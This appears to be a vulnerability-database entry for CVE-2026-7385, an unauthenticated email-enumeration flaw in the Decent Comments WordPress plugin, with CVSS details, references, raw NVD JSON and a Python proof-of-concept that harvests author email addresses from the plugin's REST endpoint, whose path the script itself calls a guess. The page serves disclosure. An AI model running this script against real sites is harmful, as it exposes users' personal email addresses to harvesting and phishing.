CVE-2026-7385

Description

The Decent Comments WordPress plugin before 3.0.2 does not restrict access to comment author email addresses and post author email addresses via its REST API endpoint, allowing unauthenticated attackers to enumerate registered user email addresses.

CVSS Details

CVSS Score

5.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Decent Comments < 3.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import re

def poc(target_url):
    """
    Proof of Concept for CVE-2026-7385
    This script attempts to enumerate user emails via the vulnerable REST API endpoint.
    """
    # The specific endpoint might vary, commonly follows pattern: /wp-json/decent-comments/v1/comments
    # or similar structure based on plugin registration.
    api_endpoint = "/wp-json/decent-comments/v1/comments"
    full_url = f"{target_url.rstrip('/')}{api_endpoint}"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
    }

    try:
        response = requests.get(full_url, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Request successful to {full_url}")
            data = response.json()
            emails = set()
            
            # Extract emails assuming the response is a list of comment objects
            if isinstance(data, list):
                for item in data:
                    # Check common fields for email addresses
                    for field in ['author_email', 'email', 'user_email']:
                        if field in item and item[field]:
                            emails.add(item[field])
            
            if emails:
                print(f"[+] Found {len(emails)} unique email addresses:")
                for email in emails:
                    print(f" - {email}")
            else:
                print("[-] No emails found in response. Structure might be different or endpoint patched.")
                print("Response snippet:", str(data)[:200])
        else:
            print(f"[-] Failed to retrieve data. Status Code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://example-wordpress-site.com" # Replace with actual target
    poc(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-7385
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-7385
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-7385/
[4] VulDB https://vuldb.com/cve/CVE-2026-7385
[5] https://wpscan.com/vulnerability/1c5949d0-cf50-45d3-a7e2-2f94cdb42405/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-7385", "sourceIdentifier": "[email protected]", "published": "2026-05-20T07:16:16.353", "lastModified": "2026-05-20T18:16:27.673", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Decent Comments WordPress plugin before 3.0.2 does not restrict access to comment author email addresses and post author email addresses via its REST API endpoint, allowing unauthenticated attackers to enumerate registered user email addresses."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "references": [{"url": "https://wpscan.com/vulnerability/1c5949d0-cf50-45d3-a7e2-2f94cdb42405/", "source": "[email protected]"}]}}